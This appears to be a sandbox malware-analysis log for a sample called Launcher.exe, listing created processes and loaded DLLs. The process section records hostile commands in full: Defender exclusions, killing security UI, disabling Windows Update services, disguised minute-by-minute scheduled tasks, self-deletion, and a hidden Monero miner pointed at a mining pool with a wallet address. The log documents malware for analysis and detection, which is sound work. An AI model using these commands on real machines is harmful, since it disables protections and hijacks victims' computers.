Source: C:\Users\user\Desktop\Launcher.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"
Source: C:\Users\user\Desktop\Launcher.exe | Process created: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Process created: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe "C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe"
Source: C:\Users\user\Desktop\Launcher.exe | Process created: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe C:\Users\user\AppData\Local\wxymrnibweqciwn.exe
Source: C:\Users\user\Desktop\Launcher.exe | Process created: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe
Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist"
Source: C:\Windows\System32\tasklist.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Get-WmiObject Win32_PortConnector"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Launcher.exe | Process created: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe
Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Get-WmiObject Win32_PortConnector"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "$services = @(\"wuauserv\",\"UsoSvc\",\"bits\",\"dosvc\",\"waasmedicSvc\"); foreach ($svc in $services) { Stop-Service $svc -ErrorAction SilentlyContinue -Force; Set-Service $svc -StartupType Disabled -ErrorAction SilentlyContinue; }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe"
Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C timeout 5 && del "C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout 5
Source: unknown | Process created: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe
Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCoreTask" /TR "C:\ProgramData\WinUpdate32\RuntimeBroker.exe" /RL HIGHEST /F
Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 5 /nobreak >nul & del "C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe"
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout /t 5 /nobreak
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "$services = @(\"wuauserv\",\"UsoSvc\",\"bits\",\"dosvc\",\"waasmedicSvc\"); foreach ($svc in $services) { Stop-Service $svc -ErrorAction SilentlyContinue -Force; Set-Service $svc -StartupType Disabled -ErrorAction SilentlyContinue; }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 472 -p 6972 -ip 6972
Source: C:\Windows\System32\fontdrvhost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6972 -s 136
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe "C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe" -a rx/0 -o xmr-eu1.nanopool.org:10343 -u 44kk8GDevYWaamLGkAxwMybbvB6k4TkDqPayXugZhwdLRL5P5mWbsaQi197NuLmJLqU1H78DvymgoA8FZTx4rPDH7Z4YL56.RIG4 -p RIG4 --cpu-priority=0 --tls --threads=2
Source: C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Launcher.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\Desktop\Launcher.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-WmiObject Win32_PortConnector""
Source: C:\Users\user\Desktop\Launcher.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "net session"
Source: C:\Users\user\Desktop\Launcher.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM SecHealthUI.exe"
Source: C:\Users\user\Desktop\Launcher.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""
Source: C:\Users\user\Desktop\Launcher.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""
Source: C:\Users\user\Desktop\Launcher.exe | Process created: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe
Source: C:\Users\user\Desktop\Launcher.exe | Process created: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe C:\Users\user\AppData\Local\wxymrnibweqciwn.exe
Source: C:\Users\user\Desktop\Launcher.exe | Process created: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe
Source: C:\Users\user\Desktop\Launcher.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""
Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Get-WmiObject Win32_PortConnector"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\net.exe net session
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 session
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM SecHealthUI.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Process created: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe "C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe"
Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist"
Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Get-WmiObject Win32_PortConnector"
Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe"
Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C timeout 5 && del "C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe"
Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Get-WmiObject Win32_PortConnector"
Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "$services = @(\"wuauserv\",\"UsoSvc\",\"bits\",\"dosvc\",\"waasmedicSvc\"); foreach ($svc in $services) { Stop-Service $svc -ErrorAction SilentlyContinue -Force; Set-Service $svc -StartupType Disabled -ErrorAction SilentlyContinue; }"
Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCoreTask" /TR "C:\ProgramData\WinUpdate32\RuntimeBroker.exe" /RL HIGHEST /F
Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 5 /nobreak >nul & del "C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout 5
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout /t 5 /nobreak
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 472 -p 6972 -ip 6972
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6972 -s 136
Source: C:\Windows\System32\WerFault.exe | Process created: unknown unknown
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\SysWOW64\net.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
